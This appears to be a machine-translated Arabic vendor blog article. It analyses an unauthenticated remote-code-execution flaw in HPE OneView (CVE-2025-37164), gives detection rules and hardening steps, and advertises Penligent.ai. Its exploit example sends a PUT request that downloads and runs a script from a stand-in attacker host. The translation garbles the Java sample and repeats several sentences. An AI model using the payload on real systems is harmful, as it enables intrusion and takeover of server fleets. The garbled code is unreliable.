في الحقبة المزدهرة لعام 2026، حيث "الحوسبة هي النفط الجديد"، لم يكن أمن مركز البيانات المادي أكثر أهمية من أي وقت مضى. ففي الوقت الذي تقضي فيه الفرق الحمراء أسابيع في صياغة عمليات الحقن الفوري لتجاوز حواجز الحماية LLM، ظهر تهديد أكثر بدائية وتدميراً من الطابق السفلي من مكدس تكنولوجيا المعلومات.
في 16 ديسمبر 2025، اهتزّ عالم الأمن بعد الكشف عن CVE-2025-37164نقطة ضعف في HPE OneView تحمل النادر والمرعب درجة CVSS 10.0.
بالنسبة إلى غير المبتدئين، فإن HPE OneView هو برنامج "الوضع الإلهي" للبنية التحتية المعرفة بالبرمجيات (SDI) الحديثة. فهو يعمل على أتمتة توفير الآلاف من خوادم HPE Synergy وProLiant - وهي الخوادم المعدنيّة المجردة التي تشغل مجموعات التدريب الأكثر تقدمًا في العالم في مجال الذكاء الاصطناعي.
CVE-2025-37164 هو تنفيذ الرمز البرمجي عن بُعد غير المصادق عليه (RCE) ثغرة أمنية. وتسمح لأي مهاجم لديه إمكانية الوصول إلى منفذ الإدارة عبر الشبكة بتنفيذ أوامر النظام التعسفية كجذر، مما يسمح لأي مهاجم لديه إمكانية الوصول إلى منفذ الإدارة بتنفيذ أوامر النظام التعسفية كجذر، مما يؤدي فعليًا إلى تسليم مفاتيح الأسطول المادي بأكمله. تتخلى هذه المقالة عن الملخص عالي المستوى لإجراء تشريح جراحي لفشل واجهة برمجة التطبيقات وآثاره على هندسة أمن الذكاء الاصطناعي.

بنية ضعف "الوضع الإلهي" الهندسية
لفهم خطورة هذا الخلل، يجب على المرء أن يفهم دور OneView. فهو موجود فوق واجهات BMC (وحدة التحكم في إدارة اللوحة الأساسية) وواجهات iLO (وحدة التحكم في الإضاءة المدمجة)، حيث يجمع التحكم في الحوسبة والتخزين وأقمشة الشبكات.
تكمن الثغرة الأمنية في نقطة نهاية REST API محددة: / Rest/ID-pools/executeCommand.
1. كارثة التكوين
في تصميم واجهة برمجة التطبيقات الآمنة، يجب حماية نقاط النهاية القادرة على تنفيذ أوامر النظام من خلال طبقات متعددة: المصادقة (OAuth/Session)، والتخويل (RBAC)، وتعقيم المدخلات.
في الإصدارات المتأثرة من OneView (قبل الإصدار 11.0)، كان تعريف نقطة النهاية ل تنفيذ الأمر عانى من خطأ كارثي في التكوين. قامت خريطة مرشح الأمان الداخلي بتمييز هذا المسار بـ نوع المصادقة NO_AUTH.
منطق الواجهة الخلفية الافتراضية (جافا/سبرينغ كود زائف):
جافا
`@@RestController @RequestMapping("/rest/id-pools") فئة عامة IDPoolController {
// خطأ فادح: فقدان @PreAuthorize("isAuthenticated()")
// كانت نقطة النهاية هذه مخصصة على الأرجح للاتصالات الداخلية بين الخدمات
// لكنها كانت مكشوفة للواجهة العامة.
@PutMapping("/executeCommand")
عامة كيان الاستجابة تنفيذ(@RequestBody CommandRequest payload) {
سلسلة ثنائية = payload.getCommand();
String[] args = payload.getArgs();
// خطأ فادح: الحقن المباشر في ProcessBuilder بدون تعقيم
ProcessBuilder pb = جديد ProcessBuilder(ثنائي);
pb.command().addAll(Arrays.asList(args));
عملية عملية = pb.start();
إرجاع ResponseEntity.ok(readOutputput(process)));
}
}`
ينشئ هذا المنطق نفقاً مباشراً من طلب HTTP إلى نواة Linux الخاصة بالجهاز.

2. تفكيك سلسلة القتل
تعقيد الاستغلال هو منخفضة. لا يوجد تلف في الذاكرة للتدليك، ولا يوجد ASLR لتجاوزه، ولا يوجد شرط سباق للفوز. إنه عيب منطقي واضح وبسيط.
بدائية الاستغلال
يرسل المهاجم طلب PUT. الحمولة عبارة عن كائن JSON يحدد الأمر المراد تشغيله.
HTTP
´PUT /rest/rest/id-pools/executeCommand HTTP/1.1 المضيف: oneview-appliance.local نوع المحتوى: تطبيق/json
{"الأمر": "/bin/sh"، "args": ["-c"، "wget http://c2.attacker.com/payload.sh -O /tmp/x؛ chmod +x /tmp/x؛ /tmp/x"] }`
النتيجة:
يقوم الجهاز بتنفيذ البرنامج النصي. يتلقى المهاجم قذيفة عكسية بامتيازات الجذر. من هنا، يكون لديهم ثبات على وحدة تحكم الشبكة نفسها.
مشهد تهديدات البنية التحتية للذكاء الاصطناعي
لماذا هذا خاص بـ "مهندس أمن الذكاء الاصطناعي المتشدد"؟ لأن البنية التحتية للذكاء الاصطناعي معرضة بشكل فريد لهذه الفئة من الهجمات.
1. سرقة وحدة معالجة الرسومات (سرقة وسرقة وحدة معالجة الرسومات)
تستخدم مجموعات التدريب على الذكاء الاصطناعي وحدات معالجة الرسومات H100/B200، وهي ذات قيمة هائلة. يمكن للمهاجم الذي لديه حق الوصول إلى OneView:
- توفير أعباء العمل المارقة: قم بتشغيل أجهزة افتراضية مخفية على المعدن المكشوف لتعدين العملات الرقمية، مستنزفاً بذلك ميغاواط من الطاقة وسعة التبريد.
- الحرمان من الموارد: خلال عملية التدريب الحرجة (التي قد تكلف الملايين)، يمكن للمهاجم أن يصدر
إيقاف التشغيلالأمر إلى الشفرات الفعلية عبر واجهة iLO، مما يتسبب في فقدان البيانات بشكل كارثي وتأخير المشروع.
2. تسمم سلسلة التوريد عبر البرامج الثابتة
يدير OneView تحديثات البرامج الثابتة لأسطول الخوادم. يمكن للمهاجم الذي لديه حق الوصول إلى الجذر:
- فلاش البرامج الثابتة الخبيثة: خفض مستوى نظام BIOS/UEFI إلى إصدارات ضعيفة أو زرع جذر خفي مستمر (مثل بلاك لوتس) في فلاش SPI لخوادم الذكاء الاصطناعي.
- الوصول المستمر: حتى لو تم مسح نظام التشغيل وإعادة تثبيته، فإن البرمجيات الخبيثة تبقى في الجهاز، مما يعرض كل نموذج مستقبلي تم تدريبه على هذا الجهاز للخطر.
3. الانتقال الجانبي إلى بحيرات البيانات
تقترن مجموعات الذكاء الاصطناعي عالية الأداء بإحكام مع أقمشة التخزين (Infiniband/RoCE). يقوم OneView بإدارة هذه الاتصالات. يسمح اختراق OneView للمهاجمين بتحميل وحدات تخزين NAS/SAN الأساسية، مما يتيح الوصول المباشر إلى مجموعات البيانات الخاصة وأوزان النماذج دون لمس شبكة AD الخاصة بالشركة.
الدفاع القائم على الذكاء الاصطناعي: الميزة البنلجنتية
يعد اكتشاف ثغرات البنية التحتية مثل CVE-2025-37164 نقطة عمياء بالنسبة لأدوات فحص تطبيقات الويب التقليدية (DAST). تقوم أدوات DAST بالزحف على HTML؛ ونادراً ما تقوم بفحص واجهات برمجة التطبيقات الإدارية الغامضة على المنافذ غير القياسية.
هذا هو المكان Penligent.ai يمثل نقلة نوعية لأمن البنية التحتية.
1. تخطيط الأصول خارج النطاق (OOB)
يستخدم وكلاء الذكاء الاصطناعي من بنليجنت رسم خرائط الأصول كاملة المكدس. فهي لا تقوم فقط بالبحث عن تطبيقات الويب؛ بل تستمع بنشاط لتوقيعات بروتوكول الإدارة (IPMI وRedfish وHPE REST API). ويربط الذكاء الاصطناعي هذه التوقيعات بأحدث معلومات التهديدات، ويحدد "البنية التحتية الظل" التي نسيت تكنولوجيا المعلومات تصحيحها.
2. التحقق غير التدميري من RCE
يعد فحص مجموعة إنتاج الذكاء الاصطناعي محفوفاً بالمخاطر. يمكن أن يؤدي الفحص السيئ إلى تعطل الخادم. يستخدم Penligent التشويش الواعي بالسياق لإجراء التحقق غير المدمر.
- حمولة آمنة: بدلاً من إرسال
RM -RF /أو قذيفة عكسية، يرسل Penligent حمولة حميدة مثلصدى "Penligent_Check". - المصادقة: يقوم الذكاء الاصطناعي بتحليل استجابة HTTP. إذا رأى السلسلة التي تم ترديدها، فإنه يؤكد عملية الإنفاذ من قِبل RCE مع التأكد من 100%، مما يسمح لفريق الأمان بتحديد أولوية التصحيح دون تعطل مهمة التدريب.
دليل الفريق الأزرق: الكشف والتقوية
إذا لم تتمكن من التصحيح على الفور، فأنت في حالة "خرق مفترض".
1. كشف الشبكة (سوريكاتا/سنورت)
مراقبة حركة المرور إلى الشبكة الفرعية لإدارة OneView. ابحث عن HTTP وضع أو البريد الطلبات إلى / Rest/ID-pools/executeCommand.
قاعدة سوريكاتا
YAML
تنبيه http $EXTERNAL_NET أي -> $ONEVIEW_SERVER 443 (msg:"ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"؛ \\ تدفق:تم الإنشاء، إلى_الخادم؛ \\ المحتوى:"/rest/rest/id-pools/executeCommand"؛ http_uri؛ \\ المحتوى:"الأمر"؛ http_client_body؛ \ المحتوى:"/bin/"؛ http_client_body؛ \ classtype:محاولة-إداري؛ sid:1000025؛ rev:1؛)
2. تدقيق السجل
تحقق من سجلات التدقيق في OneView (ci-debug.log.log أو سجل التدقيق.log) للمكالمات غير المتوقعة إلى مجموعات IdPools وحدة التحكم التي تنشأ من عناوين IP غير المضيف Bastion Host المعين.
3. الحجر الصحي المعماري
- شبكة محلية ظاهرية للإدارة: تأكّد من أن واجهة جهاز OneView موجودة على شبكة محلية ظاهرية خاصة معزولة تماماً، ولا يمكن الوصول إليها إلا عبر شبكة افتراضية خاصة افتراضية (VPN) مع MFA.
- ACLs: قم بتطبيق قوائم التحكم في الوصول على مستوى المحول لحظر كل حركة المرور إلى المنفذ 443 على جهاز OneView، باستثناء IP المحدد لمحطة عمل مسؤول النظام.
الخاتمة
CVE-2025-37164 بمثابة تذكير قاسٍ بأن "السحابة" ما هي إلا كمبيوتر شخص آخر، وهذا الكمبيوتر لديه منفذ إدارة. في خضم الاندفاع لبناء الذكاء الاصطناعي المتقدم، يجب ألا نهمل الأساس الخرساني الذي يقوم عليه.
إن أمن مستقبل الذكاء الاصطناعي لا يعتمد فقط على المواءمة القوية للنماذج، بل على سلامة سلسلة توريد السيليكون. قم بترقية برامجك الثابتة، واعزل طائرات الإدارة الخاصة بك، واستخدم التحقق الذكي والآلي لضمان عدم تحول وحدة التحكم "وضع الله" إلى ملعب للمهاجمين.
مراجع موثوقة
- النشرة الأمنية لـ HPE hpesbgn04770 (CVE-2025-37164)
- تفاصيل NIST NVD ل CVE-2025-37164
- كتالوج الثغرات الأمنية المعروفة المستغلة CISA
- تحليل Rapid7: عمليات الإنفاذ الاحتكاري الحرجة غير المصادق عليها التي تؤثر على HPE OneView
🚀 خيارات CTA
الخيار 1 (نقطة الألم - موصى به):
هل الماسح الضوئي DAST الخاص بك أعمى عن واجهات برمجة تطبيقات الإدارة؟ Penligent ليس كذلك.
توقف عن تجاهل بنيتك الأساسية. اكتشف عمليات RCE المخفية في مجموعة حوسبة الذكاء الاصطناعي لديك باستخدام Penligent اليوم.
الخيار 2 (الاستعجال):
لا تدع خطأ "الوضع الإلهي" يمحو نماذج الذكاء الاصطناعي الخاصة بك.
تحقق من صحة وضع أمان HPE OneView الخاص بك على الفور باستخدام اختبار Penligent غير المدمر.

